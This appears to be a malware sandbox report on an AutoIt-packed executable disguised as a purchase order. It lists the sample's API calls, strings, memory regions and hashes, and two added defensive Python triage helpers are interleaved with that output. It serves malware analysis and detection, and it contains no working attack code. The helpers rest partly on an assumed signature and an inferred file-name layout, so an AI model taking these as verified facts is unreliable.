                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                            • __fread_nolock.LIBCMT ref: 00452961
                                                            • __fread_nolock.LIBCMT ref: 00452971
                                                            • __fread_nolock.LIBCMT ref: 0045298A
                                                            • __fread_nolock.LIBCMT ref: 004529A5
                                                            • _fseek.LIBCMT ref: 004529BF
                                                            • _malloc.LIBCMT ref: 004529CA
                                                            • _malloc.LIBCMT ref: 004529D6
                                                            • __fread_nolock.LIBCMT ref: 004529E7
                                                            • _free.LIBCMT ref: 00452A17
                                                            • _free.LIBCMT ref: 00452A20
                                                            Similarity
                                                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                            • String ID:
                                                            • API String ID: 1255752989-0

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                            • ImageList_ReplaceIcon.COMCTL32(00A9FE80,000000FF,00000000), ref: 00410552
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                            • RegisterClassExW.USER32(?), ref: 0041045D
                                                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A9FE80,000000FF,00000000), ref: 00410552
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _malloc
                                                            • String ID: Default
                                                            • API String ID: 1579825452-753088835
                                                            • Opcode ID: 402bc54fe20d6e454d76b6e8cfb9dcc7ec7ccbd5fe5f214277c1902a6b6f839c
                                                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                            • Opcode Fuzzy Hash: 402bc54fe20d6e454d76b6e8cfb9dcc7ec7ccbd5fe5f214277c1902a6b6f839c
                                                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                             Control-flow Graph: function at 0040F5C0 (the executed/not-executed block graph is rendered on the live page and is not recoverable as text). Its blocks call the internal routines at 00422240, 00413650, 00410E60, 00414D04, 004150D1 and 00414D30.
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_fseek_memmove_strcat
                                                            • String ID: AU3!$EA06
                                                            • API String ID: 1268643489-2658333250
                                                            • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                            • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
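The function at 0040F5C0 above seeks through a file with _fseek/_fread_nolock and references the strings "AU3!" and "EA06", which together form the marker that introduces a compiled AutoIt v3 script. The following is an added triage helper, not code from the Joe Sandbox report or from AutoIt: it locates "AU3!EA06" in a byte buffer and reports whether the 16-byte signature that AutoIt unpacking tools expect in front of it is present. That 16-byte signature and the two constructed sample buffers are assumptions for the example; the report only shows the two string references.

```python
# Added example (not from the Joe Sandbox report). Finds the AutoIt v3
# compiled-script marker "AU3!EA06" in a buffer and distinguishes a real
# embedded script (16-byte signature + marker) from the interpreter merely
# referencing the marker text, which the report shows it does as two
# separate strings "AU3!" and "EA06".

AU3_MARKER = b"AU3!EA06"
# Assumed: the 16-byte signature that precedes AU3!EA06 in compiled scripts
# (taken from public AutoIt unpacking tools, not from this report).
AU3_SIG = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")


def find_au3_scripts(data: bytes) -> list:
    """Return every AU3!EA06 hit as {'offset', 'signed'}; 'signed' is True
    when the assumed 16-byte signature immediately precedes the marker."""
    hits = []
    pos = data.find(AU3_MARKER)
    while pos != -1:
        signed = pos >= len(AU3_SIG) and data[pos - len(AU3_SIG):pos] == AU3_SIG
        hits.append({"offset": pos, "signed": signed})
        pos = data.find(AU3_MARKER, pos + 1)
    return hits


def classify(data: bytes) -> str:
    """Coarse verdict: signed marker beats a bare ASCII match, which on its
    own could just be the interpreter's own string table."""
    hits = find_au3_scripts(data)
    if any(h["signed"] for h in hits):
        return "compiled-autoit-script"
    if hits:
        return "autoit-marker-text-only"
    return "no-autoit-marker"


# Constructed sample buffers (not real file contents): one with a bare
# marker followed by a signed marker, one with only the bare marker.
SAMPLE_WITH_SCRIPT = (
    b"\x00" * 64 + AU3_MARKER + b"\x00" * 32 + AU3_SIG + AU3_MARKER + b"\x01\x02\x03"
)
SAMPLE_TEXT_ONLY = b"MZ" + b"\x00" * 100 + AU3_MARKER + b"\x00" * 10

if __name__ == "__main__":
    for name, blob in (("with_script", SAMPLE_WITH_SCRIPT), ("text_only", SAMPLE_TEXT_ONLY)):
        print(name, classify(blob), find_au3_scripts(blob))
```

To run it against a real sample, read the file in binary mode and pass the bytes to classify(); the offset of a signed hit is where a script extractor would start parsing.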

                                                             Control-flow Graph: window procedure at 00401100 (block graph rendered on the live page; not recoverable as text). Its blocks call DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW and CreatePopupMenu, plus the internal routines at 00401250, 0040F190, 00401000, 0040E0C0, 00401A50, 004370F4, 00468B0E and 0045FD57.
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                            • CreatePopupMenu.USER32 ref: 00401204
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                            • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                             Control-flow Graph: function at 004115D7 (block graph rendered on the live page; not recoverable as text). Its blocks call the internal routines at 004135BB (_malloc), 00411988, 00417FC0, 0041130A, 004180AF and 00418105.
                                                            APIs
                                                            • _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • std::exception::exception.LIBCMT ref: 00411626
                                                            • std::exception::exception.LIBCMT ref: 00411640
                                                            • __CxxThrowException@8.LIBCMT ref: 00411651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                            • String ID: ,*H$4*H$@fI
                                                            • API String ID: 615853336-1459471987
                                                            • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                            • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                             Control-flow Graph: function at 03FA2648 in the non-image region at 03FA0000 (block graph rendered on the live page; not recoverable as text). Its blocks call CreateFileW, VirtualAlloc, ReadFile, VirtualAlloc again, CloseHandle and VirtualFree (twice), plus the internal routines at 03FA0048, 03FA3558, 03FA37A8 and 03FA35B8.
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03FA2719
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03FA293F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction ID: 657b5b652787f24efc3a32f8273eeb766aef97fc3b05a35063544096c3e6cf77
                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction Fuzzy Hash: 0BA13AB4E00609EBDB14CFA8C994BEEBBB5FF48305F208599E505BB280D7799A40CF50
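The record above differs from the earlier ones in two ways a practitioner should notice: the code lives at 03FA0000 in a dump the report marks "based on PE: false", and the dump name encodes page protection 00000040 and memory type 00020000. Those are the Windows values of PAGE_EXECUTE_READWRITE and MEM_PRIVATE, so this CreateFileW/ReadFile/VirtualAlloc loader runs from writable, executable, non-image memory, which is exactly what unpacked or injected code looks like. The helper below is an added example, not code from the report: it decodes the dump-name fields that are recognisable from the names on this page (base address, protection, memory type) and flags such regions. The field layout is inferred from these names; the two fields marked as unknown are left undecoded, and nothing beyond the Windows PAGE_* and MEM_* constants is assumed.

```python
# Added example (not from the Joe Sandbox report). Decodes the memory-dump
# file names printed under "Memory Dump Source" and flags regions whose
# protection/type combination indicates unpacked or injected code.
#
# Assumed field layout, inferred from the names on this page:
#   <f0>.<f1>.<dump_id>.<base16>.<protect>.<f5>.<mtype>.<f7>.sdmp
# f0, f1, f5 and f7 are not decoded here.
import re

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

SDMP_RE = re.compile(
    r"^(?P<f0>[0-9A-Fa-f]{8})\.(?P<f1>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f5>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)


def decode_sdmp(name: str, based_on_pe: bool) -> dict:
    """Decode one dump name; based_on_pe is the report's own
    'based on PE' flag for that dump."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name}")
    protect = int(m["protect"], 16)
    basic = protect & 0xFF            # drop PAGE_GUARD/NOCACHE-style modifier bits
    mtype = int(m["mtype"], 16)
    rwx_private = basic in EXECUTABLE and basic in WRITABLE and mtype == 0x20000
    exec_outside_image = basic in EXECUTABLE and (mtype != 0x1000000 or not based_on_pe)
    return {
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(basic, f"unknown(0x{basic:x})"),
        "type": MEM_TYPE.get(mtype, f"unknown(0x{mtype:x})"),
        "based_on_pe": based_on_pe,
        "suspicious": rwx_private or exec_outside_image,
    }


def suspicious_regions(dumps) -> list:
    """dumps: iterable of (name, based_on_pe). Returns decoded records
    for every region worth pulling for further analysis."""
    return [r for r in (decode_sdmp(n, pe) for n, pe in dumps) if r["suspicious"]]


# Dump names taken from this report: the main image's .text and .data, and
# the private region that hosts the loader function at 03FA2648.
REPORT_DUMPS = [
    ("00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp", False),
]

if __name__ == "__main__":
    for rec in suspicious_regions(REPORT_DUMPS):
        print(f"{rec['base']:08X} {rec['protect']} {rec['type']} based_on_pe={rec['based_on_pe']}")
```

Only the 03FA0000 region is reported; the image sections decode as PAGE_EXECUTE_READ and PAGE_READWRITE inside MEM_IMAGE and are left alone. When a report lists many dumps, feeding all of their names through suspicious_regions() is a quick way to pick the ones that deserve a YARA scan or string triage first.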

                                                             Control-flow Graph: function at 004102B0 (block graph rendered on the live page; not recoverable as text). Its blocks call SHGetMalloc, SHGetDesktopFolder and SHGetPathFromIDListW, plus the internal routines at 00412FBA and 00433244.
                                                            APIs
                                                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                            • _wcsncpy.LIBCMT ref: 004102ED
                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                            • _wcsncpy.LIBCMT ref: 00410340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                            • String ID: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 3170942423-232679026
                                                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                             Control-flow Graph: function at 0040E4C0 (block graph rendered on the live page; not recoverable as text). Its blocks call RegOpenKeyExW, RegQueryValueExW (twice) and RegCloseKey, plus the internal routines at 00403350, 004115D7, 0043652F, 00402160 and 00436508.
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                            • API String ID: 1586453840-614718249
                                                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                            Control-flow Graph

                                                            • Legend: Executed / Not Executed (block colouring in the rendered graph)
                                                            • 2154: 410570-4105f1, CreateWindowExW * 2, ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                            APIs
                                                              • Part of subcall function 03FA22E8: Sleep.KERNELBASE(000001F4), ref: 03FA22F9
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03FA253E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: DI9H625VKOM8IVXV3FMWXX7
                                                            • API String ID: 2694422964-3819048530
                                                            • Opcode ID: 918c44a81e9581ce52b631478bfc170695394f06bf90b4403560ada46b8feece
                                                            • Instruction ID: 0b323ad294622ffaa67a7227efc5fe0e8d3e1a3cadbf24995a444c13544f2d5f
                                                            • Opcode Fuzzy Hash: 918c44a81e9581ce52b631478bfc170695394f06bf90b4403560ada46b8feece
                                                            • Instruction Fuzzy Hash: 43619470E04289EBEF11DBE8C854BEEBBB4AF15300F044599E2487B2C1D7BA0B45CB65
                                                            APIs
                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcsncpy.LIBCMT ref: 00401C41
                                                            • _wcscpy.LIBCMT ref: 00401C5D
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
